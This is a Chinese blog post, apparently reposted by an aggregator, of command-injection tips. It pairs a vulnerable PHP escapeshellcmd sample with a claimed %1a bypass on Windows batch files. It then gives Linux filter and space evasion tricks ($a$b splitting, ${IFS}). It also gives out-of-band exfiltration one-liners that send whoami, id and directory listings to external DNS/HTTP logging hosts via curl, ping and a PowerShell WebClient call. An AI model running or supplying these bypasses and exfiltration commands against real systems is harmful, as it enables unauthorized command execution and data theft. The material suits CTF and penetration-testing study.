命令执行的tip
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了命令执行的tip相关的知识,希望对你有一定的参考价值。
先看一个例子:
本地测试环境:php 5.4.45 + win
<?php
$command = ‘dir ‘.$_POST[‘dir‘];
$escaped_command = escapeshellcmd($command);
var_dump($escaped_command);
file_put_contents(‘out.bat‘,$escaped_command);
system(‘out.bat‘);
?>
应该如何去绕过执行?
escapeshellcmd
http://php.net/manual/zh/function.escapeshellcmd.php
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。
具体会转义哪些字符?
https://github.com/php/php-src/blob/PHP-5.4.45/ext/standard/exec.c
这些都会用^
来取消其意义。也就是没办法用& | 来执行其他命令,只能列目录。
有这样的一个tip:执行.bat
文件的时候,利用%1a
,可以绕过过滤执行命令。
更多好玩的命令绕过
linux下面tip特别多,在实战或者ctf中遇到最多的几个。
1、黑名单绕过
执行ls命令:
a=l;b=s;$a$b
cat hello文件内容:
a=c;b=at;c=he;d=llo;$a$b ${c}${d}
2、空格绕过
绕过空格
${IFS}
或者在读取文件的时候利用重定向符
<>
最后就是别人fuzz的一个命令执行项目:
https://github.com/ewilded/shelling
3、无回显
无回显获取数据的需求还是挺大的,比如sql,xxe,xss等等,这个时候一般可以用dns/http通道来获取数据。
linux:
curl xxxx.ceye.io/`whoami`
ping -c 1 `whoami`.xxxx.ceye.io
可以获取数据,当前权限是root
但是有一个特别恼火的事情就是特殊字符或者是空格出现的话,这时候可以通过一些编码来,比如base64
curl http://xxxx.ceye.io/$(id|base64)
windows:
windows下很头疼,用起来并没有linux那么方便好用,比如curl、wget等等。
http请求:
for /F %x in (‘whoami‘) do start http://xxx.ceye.io/%x
dns请求:
获取计算机名:for /F "delims=\\" %i in (‘whoami‘) do ping -n 1 %i.xxx.dnslog.info
获取用户名:for /F "delims=\\ tokens=2" %i in (‘whoami‘) do ping -n 1 %i.xxx.dnslog.info
powershell这么厉害,为啥不用它来base64一下数据。
for /F %x in (‘whoami‘) do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(‘%x‘));$b=New-Object System.Net.WebClient;$b.DownloadString(‘http://xxx.ceye.io/‘+$a);
这样就也能获取到一个base64编码到命令结果啦~算是弥补一个小小的坑。
ps:这个是用powershell2.0写的,其他版本未测试。
但是如果没有powershell想要获取更多数据的话,还是比较麻烦的。
比如获取d:\\所有文件,遇上空格也是会被截断。
for /F %x in (‘dir /b D:\\‘) do start http://xxx.ceye.io/%x
4、借他人之手来获取字符
如果过滤了<>?,可以从已有的文件中获取自己需要的字符。
=。=,当然如果服务器能外网的话,直接wget -o /tmp 就好了。
以上是关于命令执行的tip的主要内容,如果未能解决你的问题,请参考以下文章